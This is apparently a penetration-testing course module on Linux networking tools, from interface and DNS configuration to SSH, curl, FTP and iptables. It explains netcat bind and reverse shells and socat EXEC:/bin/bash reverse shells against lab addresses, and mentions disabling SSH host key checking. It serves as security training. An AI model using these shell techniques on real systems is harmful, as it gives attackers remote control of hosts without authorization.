Linux Networking & Services
Essential Networking Utilities & Enumeration
ifconfig
or ip addr
Now, let’s take a look at the chunks of information from the two command examples above. An important interface to recognize and get started with, is the lo interface. lo stands for loopback, which is a software interface to test the local host’s network functionality.
The default IP address assigned to this interface is 127.0.0.1, also known as localhost. This means that the IP address of 127.0.0.1 is the same as localhost. This address is not routable on the internet and only pertains to the host - and not the network. Any routing that is constructed for this interface will route to itself, which can host internal resources on that machine.
The next interface that is shown in the above output is eth0 short for ethernet interface. This is the cabled connection. Linux systems utilize a device and number schema. In this case, this is the first ethernet interface. The numbers for the interfaces start at 0. This means that if another ethernet interface was added, the interface would display as eth1. This concept also applies to wireless interfaces, such as wlan. The first wireless interface would be displayed as wlan0. When you run the commands on your host, the interfaces shown may be different. The interface naming scheme covered in this module is not the only one available on Linux. Depending on the Linux flavor the default naming of the interfaces may vary.
The IP address of the host is defined next to the word inet in both utilities. ip addr shows the netmask in CIDR notation. The MAC address is shown next to the word ‘ether.’ The MAC address is the physical hardware address of the NIC in the host. This is burned into the chip, so this is an address that cannot be changed. This value is 6 bytes in length. In Linux, this can be seen with colon (:) delimiters separating each byte value. Each of the byte values is represented in hexidecimal. If you don’t know what this means, that’s ok. We’ll cover hex in the ‘Cryptography’ portion of this course. For now, just know that the MAC address is a physical address that cannot be changed - like an IP address can be - and the value of the MAC address is a value that is 6-bytes in length.
To configure the network interfaces, the GUI can be leveraged or the /etc/network/interfaces file can be modified. In various situations, it may be important to change the IP address of your host. Such as the network you are connecting to does not have a DHCP server, the network is a local network and hard-coded for configuration purposes, to ensure that your IP remains the same, or to switch between networks - if they coexist within the same physical space.
Working with the GUI isn’t always an option. Often, using the Linux Terminal is a quicker and more practical way to make configuration changes to a Linux system. Most Linux systems don’t use a GUI interface. Let’s take a look at how to configure a network interface through the command line.
In the Linux Terminal, let’s take a look at the /etc/network/interfaces file.
This is the original content of the /etc/network/interfaces file. Notice that there isn’t a reference to eth0. This is managed by the NetworkManager by default, so writing to the /etc/network/interfaces file will override the default management and use the configuration settings specified. We can modify this file to configure a network interface by adding the following lines to the file.
$ cat /etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
source /etc/network/interfaces.d/*
# The loopback network interface
auto lo
iface lo inet loopback
allow-hotplug eth0
iface eth0 inet static
address 10.1.1.254
netmask 255.255.255.0
gateway 10.1.1.1
If we run ‘ip addr’ again, we will still have the same IP address as before our change. In the case of my host, the IP will remain as 10.0.2.15. To have the configuration changes we made take effect, we will need to take down the interface and bring it back up.
Active Connections and Neighbors (netstat -natup
, ss
, apr -en
)
Now, there are many connections made from our host. There are a few important TCP states that we’ll need to cover. In the example above, ESTABLISHED indicates that this is an active connection. CLOSE_WAIT means that the remote end has shut down and the host is waiting for the socket to close. TIME_WAIT is when the socket is waiting after closing to handle packets still in the network. LISTENING is when the host is listening for incoming connections. SYN_SENT means the socket is actively attempting to establish a connection. This may indicate a firewall issue, as there is an attempt to establish communication, but nothing was received from that initial SYN request.
ss
is the replacement for netstat
and is the default on most newer Linux distributions. Ths may result in netstat not being available. The options we used for netstat are the same for ss. The output also looks very similar.
Connections coming in or going out to other networks is a very useful piece of information to identify. This can lead to understanding interconnecting services (services or programs that work together), utilizing pivot points (hosts in a network that can be used to gain access to other parts of the network), discovering internal services (such as local web servers), and even identify any ports that are listening on a host. This information can also be used to get an idea of any firewall rules (rules that allow and/or disallow network traffic). Remote connections - or even connections to network ports are not the only valuable pieces of network information.
Learning about arp (address resolution protocol) is the beginning of understanding how Layer 2 attacks work. arp shows the connected machines on a network at the layer 2 level of the OSI model.
The above output shows the default gateway (router) at 192.168.1.1 and one other device at 192.168.1.67 that is on the local network.
Routing and Network Troubleshooting (route
, traceroute
, ping
)
Understanding where network traffic is going is very important in determining what can and cannot be accessed. As we covered in the Networking Topic, routes are determined by routers on the network. Although it is the job of the routers to ultimately direct the network traffic to the destination, a host must be configured to use that router as a gateway to the end network. We’ll get a listing of routes by entering the ‘route’ command.
According to the output, a default route exists that will go to the router at 10.0.2.2. The default route could also be represented as 0.0.0.0. Much like the netstat and ss utilities, the -n option can be added to keep the network values from being translated from numerical format to the symbolic host names. The Destination field shows where the packets are going. In the case of the default route, any traffic that falls outside of the other defined routes will go to that router. The destination is displayed as a network IP. The Genmask field corresponds with the Destination field to define what hosts would be in this network. In this case, any traffic going to the 10.0.2.0/24 (Genmask of 255.255.255.0 in CIDR notation) network will go out the eth0 interface (Iface field). The Flags field shows that the connections are up (U) and one of them is a gateway (G). Keep in mind that routes don’t necessarily need to correspond with the addressing of our host. The route command shows the routing table that is used to tell the host where to direct traffic based on the IP.
To add a route: sudo ip route add 10.13.37.0/24 dev eth1
(the IP needs to point to the gateway)
Another useful utility in troubleshooting network connections is traceroute. Traceroute is another ICMP utility. The TTL (time to live) is lengthened, compared to ping, and each hop (router) is reported back to the originating host. This is ideal when determining how many router hops are between a host and the target. It is also used to determine where a point of failure may be on a network. Each hop is a router routing the traffic to the next point in the path to get to our end goal. In this case, the goal is to reach the server that holds offensive-security.com. With that, let’s run a traceroute on offensive-security.com.
Name Resolution
Name resolution is the translation of IP addresses into a human-readable format. It is much easer to remember something like kali.org, than to remember 35.185.44.232. Sometimes, this name resolution functionality on a network will be broken and force us to use the IP instead of the name. This section will cover some critical components in the Linux system to configure name resolution on the host (whether that is to reach out to a server or to be handled locally on the machine).
The name translation mechanism is currently being handled by what is called a DNS (Domain Name System) server. This is a server that takes the human-readable name, searches a table for that name, and then points the requests for that name to the IP that is related to the human-readable name. Similar to how we look up a name in a phone book to return a phone number. With respect to Linux networking, we will identify the files that are responsible for pointing to a DNS (Domain Name System) and the local files responsible for name resolution. To begin, let’s look at the /etc/resolv.conf
file. The following example was taken from a default installation of Kali. The provided Kali host may appear different.
If a search is done on a network that does not specify the domain name, the domain entry will be used. In this case, let’s suppose that a browser is open and the user enters https://www. Since the domain was not specified in this browser search, the domain entry of offensive-security.com will be added to this search, separated by a period. This will translate to https://www.offensive-security.com/. Keep in mind that the domain entry in the example given is actually a root domain, so the translation happens in full and the site is opened.
If the domain entry is not in the configuration, the search entry will be used. There can only be one value for the domain entry, whereas the search line can have a list of domains to auto-resolve.
As was resolved by the domain entry, the same would be true in the case of the search entry line. The domain entry will take priority, so having both of these lines is redundant. If there was a need to auto-resolve to multiple domains, the search entry line should be used and the domain entry line removed. An example of this could be as follows.
In the event the search entry line is configured as shown above, the search of tools will first check to see if there is a tools subdomain at offensive-security.com. If it is not found there, it will try the next entry and search for tools.kali.org.
I’ll return the /etc/resolv.conf
file back to the default configuration before continuing forward.
$ cat /etc/resolv.conf
domain offensive-security.com
search offensive-security.com
nameserver 192.168.1.1
nameserver 8.8.8.8
If the first DNS server IP fails to resolve the IP to a name, the secondary DNS set can attempt to resolve the name. Adding more nameserver entries may be useful for resolving internal resources, as well. When the need for name resolution doesn’t require a full DNS server, the /etc/hosts
file can be configured to do name resolutions.
The first column is the IP address, and the second column is the name that will resolve to the IP. Notice that localhost is provided in two locations: the IPv4 section as 127.0.0.1 and the IPv6 section as ::1. More name entries can be provided in the same line as the IP address. An example of adding ‘me’ to the 127.0.0.1 IP is as follows.
After this change, if we ping -c 2 me
, it resolves to 127.0.0.1.
Let’s discuss how that happens. The order of name resolution is handled by the /etc/nsswitch.conf
(Name Service Switch) file. Let’s take a look at this file.
The first column is the service, and the second column is the way this service is handled. In the case for the hosts service, it is handled first by local files, then mdns4_minimal, and lastly dns. the mdns4_minimal entry is a multicast DNS resolver that will auto-populate entries with a .local TLD. If there isn’t a relevant search that ends with .local, it will move on to the normal dns search. With this observation, the service related to this should first reference the /etc/hosts file that was covered previously.
Now, name resolution issues should be within your grasp to configure on a localhost. This can help when a site auto-resolves to a name, when a different name - or even an IP - was used initially. It can also make working with commonly used servers much easier. You should be able to help resolve DNS pointer issues when a localhost cannot resolve a name, as well.
Common Clients (SSH, SCP, SSHPASS)
SSH (Secure Shell Protocol) is a client/server protocol that allows for secure communications between two hosts. This communication is encrypted over the network, which telnet (another similar client utility) is not. SSH is commonly used to gain remote access into another host to either use or administer it. SSH works on TCP port 22 by default. It is a protocol that requires a form of authentication, whether that be a standard username/password or a public/private key. Let’s begin looking at the general usage of ssh. In order for you to be able to follow along, let’s start a local ssh server on the Kali host. Your output will look slightly different than what is shown below.
Often times, there will be a SSH server hosted on a different port than default. To find out how to chance this, let’s take a look at the /etc/ssh/sshd_config
configuration file. Note that this is not the /etc/ssh/ssh_config
file. The /etc/ssh/sshd_config
file is the for the ssh daemon process (the server process), whereas the /etc/ssh/ssh_config
configuration file is for the ssh client.
As shown in the output, the Port line is commented out by default. Let’s uncomment this line, and change the port value to 2222.
Despite the change to the Port line, the ssh server is still available on port 22. Based on the configuration, this is not how the service should work. The issue here is that the ssh service daemon was not restarted. Let’s restart the ssh service now.
Now that the service is restarted, let’s try to access the ssh server on the default port again.
This is expected behavior of the ssh server. The server should be hosted on port 2222, so let’s add the -p option to specify the port we want to connect to.
ssh kali@localhost -p 2222
An important directory for ssh is the .ssh
directory that gets created in a user’s home directory.
The first time a ssh connection is made to a host, the client (our host) will ask if we are sure we want to make the connection. When either yes or fingerprint is entered, our host will store the information to remember it next time.
Let’s go into this directory and see what’s in it.
As we found, there is a file called known_hosts inside the ~/.ssh directory. This is what the prompt was adding to the kali host, when prompting for the connection. Right now, the values of this are hashed, so it is not possible for us to understand this without decoding the output. This is controlled in the client configuration file, /etc/ssh/ssh_config. Let’s look at the value to control this.
Let’s change this value to no, clear the stored file, and try the connection again. Now, when we read the known_hosts file, we can understand more information about what connection each line refers to.
The benefit of hashing the known_hosts file is in the event of a host compromise, an attacker would have a harder time gaining more information about remote systems that are being accessed from the host.
In the listing above, the first object highlighted is the connection destination and port. Since this was reached using the human-readable name (canonical name), it also translates that name to the IP address and port. The next highlighted portion of the listing shows the hashing algorithm that was used to fingerprint this host. In the case of the example, it is using the Elliptic Curve Digital Signature Algorithm with SHA-256. The last portion is the hash of the remote host in the connection. All of these objects put together make the fingerprint of the remote host.
This helps prevent eavesdropping or a rogue device by accounting for these pieces of information along with the hash value. Sometimes an internal network can have a change in the hosts IP that will affect the fingerprint of the known host. This can also happen in a lab environment.
The way to get around the error that an attack may be happening is to do one of two things: 1. Remove the known_hosts file or entry to that server in the file or 2. add the -o stricthostkeychecking=no option to the ssh command. Remember that this file is a security mechanism to prevent an unauthorized host from eavesdropping on network traffic. In real-world practice, this mechanism should not be bypassed.
Instead of changing a global configuration file that affects all users on a system, we’ll look at a file that may be more relevant to a separate user account. This file is ~/.ssh/config
. This is read before the /etc/ssh/ssh_config file. It is a user-defined file to handle the client configuration for a host, all hosts, or even exclude hosts. Since this is a user-defined file, it will not exist by default. Let’s take a look at creating this file for the example given for bandit.labs.overthewire.org.
Now that an entry for bandit was made in the ~/.ssh/config file, these settings in the ssh configuration will be used when using the alias bandit. It is also important to note that this file must have 0600 (-rw-------) permissions on it. Let’s run the ssh command against the alias.
SSH can also be used to remotely copy files, through a utility called SCP (Secure Copy Protocol). For this example, we’ll shift back to the local SSH server. Let’s go into the Kali user’s home directory and start the SSH service again.
The syntax for scp
is very similar to the cp
command, except the location of the file is going to have User@host:remote-file-path
.
The last thing we’ll go over in the ssh portion of this section is sshpass
. This utility is designed to supply the ssh password in the command execution, rather than have to manually enter it in at the prompt. This is useful in that an ssh session can be opened through a script and not require the interaction of a user. Despite the usefulness of this utility, there are severe security drawbacks. Before we get into the negatives of using sshpass, let’s go over how it works, including how to install it.
The ssh connection was automatically logged into with the provided password. Now that the functionality of sshpass was covered, let’s look at two reasons why we may choose not to use this utility in a production environment. The first is the command history. If a user on a host is compromised, the history command can show the latest commands that were executed by that user. This can be used by an attacker to identify user credentials, other remote systems that are accessible, and even lead to full-system control by means of privilege escalation. Remember, in the Linux module of this course, the history of user commands was found by reading the ~/.zsh_history file. The history command does the same thing for the current user. Let’s take a look at the latest history of the kali user, now.
In the listing above, we can find the password to the bandit host alias in plaintext. An attacker could use this information to also gain access to the remote host. The other reason is very similar to this, which is the fact an attacker could read the password in plaintext if this utility is used in a script. It is bad practice to have passwords in plaintext in any file on a system, so implementing this into a script is a bad practice.
Netcat (nc
)
Netcat, first released in 1995(!) by Hobbit, is one of the “original” network penetration testing tools and is so versatile that it lives up to the author’s designation as a hacker’s “Swiss army knife”. The clearest definition of Netcat is from Hobbit himself: a simple “utility which reads and writes data across network connections, using TCP or UDP protocols.”
Connecting to a TCP/UDP Port
As suggested by the description, Netcat can run in either client or server mode. To begin, let’s look at the client mode.
We can use client mode to connect to any TCP/UDP port, allowing us to:
- Check if a port is open or closed.
- Read a banner from the service listening on a port.
- Connect to a network service manually.
Let’s begin by using Netcat (nc) to check if TCP port 110 (the POP3 mail service) is open on one of the lab machines. We will supply several arguments: the -n option to skip DNS name resolution; -v to add some verbosity; the destination IP address; and the destination port number:
Listing 60 tells us several things. First, the TCP connection to 10.11.0.22 on port 110 (10.11.0.22:110 in standard nomenclature), succeeded, so Netcat reports the remote port as open. Next, the server responded to our connection by “talking back to us”, printed out the server welcome message, and prompted us to log in, which is standard behavior for POP3 services.
Let’s try to interact with the server:
Listening on a TCP/UDP Port
Listening on a TCP/UDP port using Netcat is useful for network debugging of client applications, or otherwise receiving a TCP/UDP network connection. Let’s try implementing a simple chat service involving two machines, using Netcat both as a client and as a server.
On a Windows machine with IP address 10.11.0.22, we set up Netcat to listen for incoming connections on TCP port 4444. We will use the -n option to disable DNS name resolution, -l to create a listener, -v to add some verbosity, and -p to specify the listening port number:
Now that we have bound port 4444 on this Windows machine to Netcat, let’s connect to that port from our Linux machine and enter a line of text:
Our text will be sent to the Windows machine over TCP port 4444 and we can continue the “chat” from the Windows machine:
Transferring Files with Netcat
Netcat can also be used to transfer files, both text and binary, from one computer to another. In fact, forensics investigators often use Netcat in conjunction with dd (a disk copying utility) to create forensically sound disk images over a network.
To send a file from our Kali virtual machine to the Windows system, we initiate a setup that is similar to the previous chat example, with some slight differences. On the Windows machine, we will set up a Netcat listener on port 4444 and redirect any output into a file called incoming.exe:
On the Kali system, we will push the wget.exe file to the Windows machine through TCP port 4444:
The connection is received by Netcat on the Windows machine as shown below:
Notice that we have not received any feedback from Netcat about our file upload progress. In this case, since the file we are uploading is small, we can just wait a few seconds, then check whether the file has been fully uploaded to the Windows machine by attempting to run it:
We can see that this is, in fact, the wget.exe executable and that the file transfer was successful.
Remote Administration with Netcat
One of the most useful features of Netcat is its ability to do command redirection. The netcat-traditional version of Netcat (compiled with the “-DGAPING_SECURITY_HOLE” flag) enables the -e option, which executes a program after making or receiving a successful connection. This powerful feature opened up all sorts of interesting possibilities from a security perspective and is therefore not available in most modern Linux/BSD systems. However, due to the fact that Kali Linux is a penetration testing distribution, the Netcat version included in Kali supports the -e option.
When enabled, this option can redirect the input, output, and error messages of an executable to a TCP/UDP port rather than the default console.
For example, consider the cmd.exe executable. By redirecting stdin, stdout, and stderr to the network, we can bind cmd.exe to a local port. Anyone connecting to this port will be presented with a command prompt on the target computer.
To clarify this, let’s run through a few more scenarios involving Bob and Alice.
Netcat Bind Shell Scenario
In our first scenario, Bob (running Windows) has requested Alice’s assistance (who is running Linux) and has asked her to connect to his computer and issue some commands remotely. Bob has a public IP address and is directly connected to the Internet. Alice, however, is behind a NATed connection, and has an internal IP address. To complete the scenario, Bob needs to bind cmd.exe to a TCP port on his public IP address and asks Alice to connect to his particular IP address and port.
Bob will check his local IP address, then run Netcat with the -e option to execute cmd.exe once a connection is made to the listening port:
Now Netcat has bound TCP port 4444 to cmd.exe and will redirect any input, output, or error messages from cmd.exe to the network. In other words, anyone connecting to TCP port 4444 on Bob’s machine (hopefully Alice) will be presented with Bob’s command prompt. This is indeed a “gaping security hole”!
Reverse Shell Scenario
In our second scenario, Alice needs help from Bob. However, Alice has no control over the router in her office, and therefore cannot forward traffic from the router to her internal machine.
In this scenario, we can leverage another useful feature of Netcat; the ability to send a command shell to a host listening on a specific port. In this situation, although Alice cannot bind a port to /bin/bash locally on her computer and expect Bob to connect, she can send control of her command prompt to Bob’s machine instead. This is known as a reverse shell. To get this working, Bob will first set up Netcat to listen for an incoming shell. We will use port 4444 in our example:
Now, Alice can send a reverse shell from her Linux machine to Bob. Once again, we use the -e option to make an application available remotely, which in this case happens to be /bin/bash, the Linux shell:
Once the connection is established, Alice’s Netcat will have redirected /bin/bash input, output, and error data streams to Bob’s machine on port 4444, and Bob can interact with that shell:
Socat
Socat is a command-line utility that establishes two bidirectional byte streams and transfers data between them. For penetration testing, it is similar to Netcat but has additional useful features.
While there are a multitude of things that socat can do, we will only cover a few of them to illustrate its use. Let’s begin exploring socat and see how it compares to Netcat.
Netcat vs Socat
First, let’s connect to a remote server on port 80 using both Netcat and socat:
Note that the syntax is similar, but socat requires the - to transfer data between STDIO and the remote host (allowing our keyboard interaction with the shell) and protocol (TCP4). The protocol, options, and port number are colon-delimited.
Because root privileges are required to bind a listener to ports below 1024, we need to use sudo when starting a listener on port 443:
Notice the required addition of both the protocol for the listener (TCP4-LISTEN) and the STDOUT argument, which redirects standard output.
Socat File Transfers
Next, we will try out file transfers. Continuing with the previous fictional characters of Alice and Bob, assume Alice needs to send Bob a file called secret_passwords.txt. As a reminder, Alice’s host machine is running on Linux, and Bob’s is running Windows. Let’s see this in action.
On Alice’s side, we will share the file on port 443. In this example, the TCP4-LISTEN option specifies an IPv4 listener, fork creates a child process once a connection is made to the listener, which allows multiple connections, and file: specifies the name of a file to be transferred:
On Bob’s side, we will connect to Alice’s computer and retrieve the file. In this example, the TCP4 option specifies IPv4, followed by Alice’s IP address (10.11.0.4) and listening port number (443), file: specifies the local file name to save the file to on Bob’s computer, and create specifies that a new file will be created:
Socat Reverse Shells
Let’s take a look at a reverse shell using socat. First, Bob will start a listener on port 443. To do this, he will supply the -d -d option to increase verbosity (showing fatal, error, warning, and notice messages), TCP4-LISTEN:443 to create an IPv4 listener on port 443, and STDOUT to connect standard output (STDOUT) to the TCP socket:
Next, Alice will use socat’s EXEC option (similar to the Netcat -e option), which will execute the given program once a remote connection is established. In this case, Alice will send a /bin/bash reverse shell (with EXEC:/bin/bash) to Bob’s listening socket on 10.11.0.22:443:
Once connected, Bob can enter commands from his socat session, which will execute on Alice’s machine.
HTTP (wget
, curl
)
wget is a very useful utility to download files from a web server. wget is derived from World Wide Web and ‘get.’ Typing ‘wget’ in the Linux terminal will display the usage for the utility.
To get an idea of how to use wget, let’s download the syllabus for the course after this (PEN-200). The PDF is located at https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf. In the Linux Terminal, we’ll enter the following.
Next, we will cover is how to rename the downloaded file. This can be done with the ‘-O’ option. This is a capital ‘o.’ The lowercase ‘o’ option will log the the messages displayed on the terminal to the file specified. The two options will be demonstrated.
The last thing we’ll cover with wget is the ‘—recursive’ option. This is great when the goal is to rebuild a website or copy an entire website into your host. Be careful when doing this, as some websites contain a lot of data and will fill up your hard drive when pulling it all in. In the following example, I execute wget with the ‘—recursive’ option on https://www.kali.org/. I stopped the website copy by pressing
When this process is completed, the website can be searched within the current directory. Let’s list the downloaded content in the terminal.
wget neatly organizes the downloaded content in the same structure as the website. This may be a useful activity for a security professional to search an entire website for things like cleartext credentials, databases, uncontrolled directories, etc.
Another client we can use to copy files from servers is cURL. The name stands for “Client URL.” curl is extremely powerful in that it includes an incredible amount of options that can be added to manipulate the request to the server. We’ll cover the following options: —silent (don’t show progress meter or error message), -o (output file), -k (suppresses certificate errors), and -x (using a proxy). Before we begin with the options, let’s take a look at the most basic usage. The previous files that were downloaded with wget were removed before these exercises.
In the output above, the most basic execution of curl did not work. This is because we were attempting to download a PDF file, which doesn’t render the same as a webpage or plaintext content. Let’s follow the advice from the error message and add the output option (-o) with a name for the file.
We followed the advice of the output error and added an output option (-o) to give the downloaded file a name. This file was then downloaded and can be verified as a PDF, using the ‘file’ command. Let’s take another look at the basic usage of curl, but this time on a webpage and not a file.
Let’s now look at another site example that will give an error message with the same syntax of curl.
Strangely, the same error appears again. Let’s take a look at why this may be happening by looking at the HTTP Headers with the ‘-I’ option.
The reason the error is still showing the page as a binary is due to the content-encoding header from the web server. Note that the encoding is ‘gzip.’ This means that the page is sending a compressed zip file as the delivery method to the browswer. This also registers as a binary. When presented with these types of errors, referring to the manpage3 or Google-ing the error message can be incredibly useful. For now, we’ll just tell you that the option to use to overcome the error is ‘—compressed.’ Web headers and the way websites work will be further covered in the “Web” section of this course. Let’s execute the curl command again with the appropriate option for this site.
In line with the subject of erroneous output, in many lab settings, web certificate errors come up. To suppress these errors and continue, the ‘-k’ option can be used. Outside of labs, it is not recommended to use this option, unless it is known that the web server is trusted. For the next demonstration, https://self-signed.badssl.com/ will be used to exhibit the error and overcoming the error with this option.
When we add the ‘-k’ option, the SSL error will be ignored and the page can be retrieved.
Curl can also leverage a proxy before pulling the content from a web page by adding the ‘-x’ option. The syntax for this is as follows.
The system in this demonstration is taken from VulnHub4, and is called “SickOS: 1.15.” The goal in this demonstration is not to cover the exploitation of this vulnerable machine or the tools that are involved, but to exhibit the use of a proxy on the system to read web content with curl. SickOs: 1.1 has the IP address of 192.168.56.4 on my system.
Again, don’t worry about the details of this nmap scan. What is important for us, from this output, is the port 3128. On 3128, a HTTP proxy (Squid) is displayed. Let’s try to connect to the standard port 80 with curl. Note that port 80 isn’t shown in the nmap output above. This is purely a demonstration as to what the proxy does when used.
Now, let’s try to leverage the internal proxy on the system and curl the same webpage.
The page now resolves, and we can clearly see that the OS is sick.
DNS (host
, dig
, nslookup
)
The Domain Name System (DNS) is one of the most critical systems on the Internet and is a distributed database responsible for translating user-friendly domain names into IP addresses.
This is facilitated by a hierarchical structure that is divided into several zones, starting with the top-level root zone. Let’s take a closer look at the process and servers involved in resolving a hostname like www.megacorpone.com.
The process starts when a hostname is entered into a browser or other application. The browser passes the hostname to the operating system’s DNS client and the operating system then forwards the request to the external DNS server it is configured to use. This first server in the chain is known as the DNS recursor and is responsible for interacting with the DNS infrastructure and returning the results to the DNS client. The DNS recursor contacts one of the servers in the DNS root zone. The root server then responds with the address of the server responsible for the zone containing the Top Level Domain (TLD), in this case, the .com TLD.
Once the DNS recursor receives the address of the TLD DNS server, it queries it for the address of the authoritative nameserver for the megacorpone.com domain. The authoritative nameserver is the final step in the DNS lookup process and contains the DNS records in a local database known as the zone file. It typically hosts two zones for each domain, the forward lookup zone that is used to find the IP address of a specific hostname and the reverse lookup zone (if configured by the administrator), which is used to find the hostname of a specific IP address. Once the DNS recursor provides the DNS client with the IP address for www.megacorpone.com, the browser can contact the correct web server at its IP address and load the webpage.
To improve the performance and reliability of DNS, DNS caching is used to store local copies of DNS records at various stages of the lookup process. That is why some modern applications, such as web browsers, keep a separate DNS cache. In addition, the local DNS client of the operating system also maintains its own DNS cache along with each of the DNS servers in the lookup process. Domain owners can also control how long a server or client caches a DNS record via the Time To Live (TTL) field of a DNS record.
Interacting with a DNS Server
Each domain can use different types of DNS records. Some of the most common types of DNS records include:
- NS - Nameserver records contain the name of the authoritative servers hosting the DNS records for a domain.
- A - Also known as a host record, the “a record” contains the IP address of a hostname (such as www.megacorpone.com).
- MX - Mail Exchange records contain the names of the servers responsible for handling email for the domain. A domain can contain multiple MX records.
- PTR - Pointer Records are used in reverse lookup zones and are used to find the records associated with an IP address.
- CNAME - Canonical Name Records are used to create aliases for other host records.
- TXT - Text records can contain any arbitrary data and can be used for various purposes, such as domain ownership verification.
Due to the wealth of information contained within DNS, it is often a lucrative target for active information gathering.
To demonstrate this, we’ll use the host
command to find the IP address of www.megacorpone.com:
By default, the host command looks for an A record, but we can also query other fields, such as MX or TXT records. To do this, we can use the -t option to specify the type of record we are looking for:
Beyond the use of the host command, nslookup and dig can be used to identify the IP addresses of hosts by their human-readable names. nslookup and dig are very similar tools. Let’s cover the basic usage of nslookup.
The above output shows that kali.org has the IP address of 35.185.44.232. Again, your output may be different, if the IP changes from the time of this writing. There is more that can be done with nslookup, but let’s move on to dig. dig operates similarly to nslookup, and the basic usage is the same.
As can be observed in the output above, the host IP for kali.org is 35.185.44.232. Notice that the default search record for both nslookup and dig is the A record. This can be changed by specifying the type in the command line. In dig, this is done with the -t (type) option. Let’s look at what mailservers may be used for kali.org.
dig can also specify a DNS server to make the request to. This is done by adding the @ symbol followed by the name or IP of the DNS server. The following demonstrates the request to Google’s DNS server to kali.org.
FTP (ftp -vn
)
FTP (File Transfer Protocol) is one of the oldest protocols used today. It is a very simple protocol to use for file transfers and can be a proven treasure trove for a penetration tester and/or information security professional if the FTP server is misconfigured or the credentials are leaked. There are many instances where sensitive files are in a FTP server that lead to compromise of a system. There are also many instance where a FTP server is used to upload files to a web server directory, which an attacker can leverage to place malicious files on the server.
File Transfers
In the following demonstrations, We have a local FTP server. The setup for this is out-of-scope, as the focus of this section is to gain the familiarity of using the FTP client on already configured FTP servers. Before beginning, let’s take a look at two helpful options with the ftp client. -v shows all responses from the FTP server. This can be useful in debugging any connectivity issues. There is also a -n option that prevents an auto-login from happening on the FTP server. If the auto-login feature is enabled, the server will attempt to take the currently used user to log into the server. This disallows specifying a different username and password.
The easiest way to access a FTP server is through anonymous access. This is when the user is anonymous and a password is not needed. Anything can be entered in as the password, and the login will be accepted. This is one of the most insecure configurations, as it allows anyone to log into the FTP server. Let’s log in with anonymous access.
When using the -n option, the initial logging in is a bit different, as it doesn’t prompt for the username or password. Let’s go through this process to cover this difference in logging in.
As shown in the listing above, the username and password need to be entered before access is granted to the server. Let’s do that now.
There’s a directory in the anonymous directory on the server. Let’s create a file an upload it to the directory. To do this, let’s change our current working directory to /var/tmp and create the file there.
Now that the file is created, we can log back into the FTP server and upload the file with the put command.
The file was not uploaded and displayed an error message of 553 Could not create file.. Note the permissions of the pub directory is writeable by everyone. Let’s go into that directory and attempt the upload again.
Let’s log in with a user account to the FTP server. We’ll use the kali user to do this.
It is important to note that this user account requires the correct password. This is unlike the anonymous account, that could use any or no password. This login shows a user directory, instead of the pub directory. There’s an interesting file in this directory too. Let’s download the specialcredentials.txt file and take a look at its contents. To download a file from a FTP server, we’ll use the get command.
Before concluding our coverage of FTP, let’s briefly talk about two subjects: Active vs. Passive FTP and Binary vs. ASCII modes. Active vs. Passive FTP connections involve the initial FTP port to the server and the resulting FTP server port that is used to send traffic back. In both cases, the server port will be port 21 (in a default configuration). FTP works in two channels, as well. There is the command channel and the data channel. In Active Mode, the port that is used by the FTP server is going to be port 20. The flow for this mode is the host connecting to the FTP Server will use a random port to connect to port 21 of the FTP server on the command channel. The FTP server will communicate from port 20 to a random port on the host that connected to it on the data channel. In Passive Mode, the port that is used by the FTP server is going to be a random port. The flow for this mode is the host connecting to the FTP server will use a random port to connect to port 21 of the FTP server on the command channel. The host connecting sends a PASV command to the FTP server. The FTP server receives the PASV command and responds by connecting from a random port to a random port to the connecting host. Depending on how the FTP server is configured, the network mode on the client may need to be changed.
Binary vs. ASCII modes has to do with how the file is transferred. If the file is a text file, ASCII mode can be used. If the transfer is done from a UNIX to a Microsoft system, ASCII mode will automatically add a ^M to the end of each newline. If the transfer is from a Microsoft host to a UNIX host, the ^M will be removed from each newline end. This ensures compatibility with reading a text file when being transferred from one type of system to another. Binary mode will keep the file in its original state, without modifying the newline entries. If transferring a binary, Binary mode should be used. Otherwise the execution of the binary may get corrupted due to the modification of the newline entries. Let’s quickly go over the FTP ascii and binary commands.
ACLs Overview and Netfilter Introduction (iptables -L
)
Before we can cover basic firewall configurations, it is important to understand what an Access Control List (ACL) is. An ACL is a list of rules to control access to computer resources. This can be either in the filesystem or network. For the case of this section, we’ll strictly be covering network ACLs.
A network ACL will typically have three actions it can take. These would be ACCEPT, DROP, or REJECT. Let’s look at a firewall like a guest list at a fancy party. When someone arrives at the party doors, the guest list is checked. If they are on that list under ACCEPT, they are let inside. If they are not on the list, they won’t be allowed in the party. This would be the same as DROP. Let’s pretend there’s a special category of unwelcome guests that may show up. This would fall under the REJECT list, where an explanation is given to the guest that is not allowed in. “Sir, last time we invited you, you ate all the food and didn’t leave any for anyone else.” Not only would this guest not be allowed in, but a response message is provided by the staff member controlling entry at the door.
Firewalls also have default policy. In this example, the default policy is a DROP (not allow) policy. This means that anyone that isn’t on the list is not allowed in the party. If the policy was a default ACCEPT, only those on the list to DROP or REJECT would be not allowed in the party. When it comes to network traffic, it is easiest to have a default ACCEPT policy. There may be many unknown connections that want to be made to a networked device. This is much less secure than a default DROP policy. With a default DROP policy, access is explicitly defined to only allowed trusted devices on the network. The ACL will also be read from the top to the bottom and the rules will be followed in the order in which they are read. This being said, if a rule explicitly allows a type of traffic through and later drops that same type of traffic, the traffic will be allowed. It doesn’t matter that there are conflicting rules on the same match. The firewall will take the first action that matches the rules.
The direction of this traffic also needs to be considered. Most times, people think only of traffic coming from the outside of a network to internal network resources. Firewalls also handle the internal network access and can even be what is known as stateless or stateful.
The state, in this case, is the origination of a network session that is established. The firewall will monitor the network traffic and allow sessions that were allowed, to remain allowed. If a user opens a network session from the internal network to an outside resource and the traffic is allowed, the session state will be stored in the firewall records. Any further communication between that internal host and the remote resource will be allowed as long as that session remains open. This takes more computing resources on the firewall and can be considered to be a more robust way to manage network traffic. iptables is a stateless firewall, by default. This can be changed to make the iptables stateful, if desired.
For the sake of keeping this at a basic level, this will not be in scope for this course. It is more important that it is understood that state can play a role in how some firewalls are configured.
The Linux kernel has a packet filtering framework, called netfilter. The utility that hooks into this framework is iptables. iptables is used to create and/or modify ACLs for the Linux firewall. Let’s take a look at the default iptables listing.
iptables has multiple tables to store different types of ACLs. The default table is called the filter table. This is the only table that we will cover in this course, but you should be aware that the following tables also exist within iptables. The following was taken directly from the manpage of iptables.
